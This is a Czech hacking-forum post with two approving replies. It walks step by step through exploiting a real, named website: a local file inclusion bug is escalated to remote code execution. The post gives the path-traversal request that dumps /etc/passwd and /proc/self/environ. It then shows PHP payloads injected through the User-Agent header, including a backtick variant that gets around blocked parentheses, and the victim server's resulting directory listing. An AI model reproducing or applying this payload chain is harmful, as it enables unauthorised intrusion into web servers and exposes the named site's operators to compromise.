bodegasite.com od LFI k RCE aneb proc/self/environBugTrack
| bodegasite.com od LFI k RCE aneb proc/self/environ | # |
| Zdravim vsechny,chtel jsem se s vami podelit o chybu,ktera neni z nejbeznejsich,ale presto,jak uvidite,ma dopad fatalni :) (alespon bude paleta bugtracku pestrejsi a ne jen SQLi,XSS..).
Zacneme tedy nalezenim webu,kde jsme schopni najit LFI,v nasem pripade to bude web [link]
a vysledek:
Warning: require(baf) [function.require]: failed to open stream: No such file or directory in /home/bodega/public_html/index.php on line 165
Spousta z vas by po shlednuti vystupu mozna brala vec jako vyresenou a pristoupila k nahrani shellu(LFI --> RFI),ovsem v tom pripade budete zastaveni diky php direktive:
Warning: require() [function.require]: URL file-access is disabled in the server configuration in /home/bodega/public_html/index.php on line 165
Zde tedy moznost RFI konci,to nam ale nevadi:) Dale zkusime,co vsechno muzeme inkludovat,takze :
[link]
a vysledek:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdow
n halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nolo
gin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nol
ogin operator:x:11:0:operator:/root:/sbin/nologi
n games:x:12:100:games:/usr/games:/sbin/nolog
in gopher:x:13:30:gopher:/var/gopher:/sbin/nol
ogin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologi
n sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/n
ologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nolo
gin apache:x:48:48:Apache:/var/www:/sbin/nologi
n mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash...
Mame tedy k ruce tento uzitecny seznam,ktery nam v nasi veci neposlouzi,ale ma zase jine moznosti vyuziti.Alespon jsme si overili,ze muzeme inkludovat relativne bez omezeni.Nyni uz pristoupime k inkluzi samotneho /proc/self/environ :
DOCUMENT_ROOT=/home/bodega/public_html&
#65533;GATEWAY_INTERFACE=CGI/1.1�
;HTTP_ACCEPT=text/html,application/xhtml+xm
l,application/xml;q=0.9,*/*;q=0.8ᦙ
3;HTTP_ACCEPT_CHARSET=windows-1250,utf-8;q=
0.7,*;q=0.7�HTTP_ACCEPT_ENCODING
=gzip,deflate�HTTP_ACCEPT_LANGUA
GE=cs,en-us;q=0.7,en;q=0.3�HTTP_
CONNECTION=keep-alive�HTTP_HOST=
www.bodegasite.com�HTTP_KEEP_ALI
VE=115�HTTP_USER_AGENT=Mozilla/5
.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6�PATH=/bin:/usr/bin
�QUERY_STRING=page=../../../../.
./../proc/self/environ�REDIRECT_
STATUS=200�REMOTE_ADDR=62.168.8.
65�REMOTE_PORT=7663�R
EQUEST_METHOD=GET�REQUEST_URI=/?
page=../../../../../../proc/self/environ&am
p;#65533;SCRIPT_FILENAME=/home/bodega/publi
c_html/index.php�SCRIPT_NAME=/in
dex.php�SERVER_ADDR=208.77.96.52
�SERVER_ADMIN=webmaster@bodegasi
te.com�SERVER_NAME=www.bodegasit
e.com�SERVER_PORT=80�
SERVER_PROTOCOL=HTTP/1.1�SERVER_
SIGNATURE=
Ti bystrejsi z vas si vsimnou,ze ve vypisu muzeme jednu vec ovlivnit a to sice :"HTTP_USER_AGENT".Ja osobne pouzivam prohlizec FF,tedy za timto ucelem pouzivam User aget switcher add on ([link]
Zapnete user agent switcher a zmente user agenta na <? passthru(?_GET[xxx]) ?>.
Dale zavolejte nasledujici link:
[link]
Ocekavame vypis adresarove struktury,ale ejhle:
Parse error: syntax error, unexpected T_STRING in /proc/27898/environ on line 1
Po chvilce badani prijdete nato,ze nam neprojdou zavorky "()",coz je celkem smula,jelikoz fce v php zavorky potrebuji(zde me prosim nechytejte za slovicko,potrebuji je fce,ktere potrebujeme my :) ).
Nastesti PHP podporuje execution operator aka backtick.S touto vedomosti opet nastartujeme agent switchera a napiseme do nej toho:
<?php $prikaz = `ls -al`; echo "$prikaz";?>
A vysledek:
total 19156 drwxr-x--- 18 bodega nobody 4096 Jun 26 15:28 . drwx--x--x 17 bodega bodega 4096 Jul 15 23:50 .. -rw------- 1 bodega bodega 14 Jul 5 06:28 .ftpquota -rw-r--r-- 1 bodega bodega 1 Jun 11 2007 .htaccess drwxr-xr-x 2 bodega bodega 4096 Jun 20 2007 .smileys -rw-r--r-- 1 bodega bodega 7381 Jun 20 2007 .wysiwygPro_edit_index_html.php -rw-r--r-- 1 bodega bodega 3812 Dec 26 2007 .wysiwygPro_edit_product_html.php -rw-r--r-- 1 bodega bodega 3497 Feb 17 16:21 ClearOverPlaySeekMute.swf drwxr-xr-x 2 bodega bodega 4096 May 30 2007 Connections -rw-r--r-- 1 bodega bodega 65536 Apr 29 11:18 UTC55i.AVI drwxr-xr-x 2 bodega bodega 4096 May 1 2007 _notes drwxr-xr-x 7 bodega bodega 4096 Jun 19 15:33 admin -rw-r--r-- 1 bodega bodega 2726550 Jun 11 2007 bodegaheader.gif -rw-r--r-- 1 bodega bodega 47891 May 1 2007 bodegaheader.jpg drwxr-xr-x 2 bodega bodega 4096 Apr 28 2007 cgi-bin drwxr-xr-x 9 bodega bodega 4096 Jun 4 2007 chat -rw-r--r-- 1 bodega bodega 4312 Jul 26 2007 confin.html -rw-r--r-- 1 bodega bodega 9085 Aug 2 2007 confin.php -rw-r--r-- 1 bodega bodega 1214 Sep 28 2006 cons.jpg -rw-r--r-- 1 bodega bodega 4521 Jan 30 2009 contactus.html -rw-r--r-- 1 bodega bodega 4780 Jul 27 2007 desktop.php -rw-r--r-- 1 bodega bodega 13703 Jul 17 2007 desktopseries.html -rw-r--r-- 1 bodega bodega 19378 May 1 2007 desktopseries1.html
Docilili jsme tedy moznosti prez LFI spustit libovolny prikaz.Dekuji za precteni a doufam,ze vam tento kus textu neco dal.
Player aka RnmX4
(odpovědět) | | Player1 | 62.168.8.* | 16.7.2010 14:18 |
|
|
| | re: bodegasite.com od LFI k RCE aneb proc/self/env | # |
| Moc pekne, o "execution operator aka backtick" jsem nevedel. Diky.
----------
Cow power by Gentoo...
(odpovědět) | |
|
| | re: bodegasite.com od LFI k RCE aneb proc/self/env | # |
| wow, super vecicka :) fakt ze jo..
(odpovědět) | | pcdm | 89.103.11.* | 27.7.2010 14:20 |
|
|
|
|
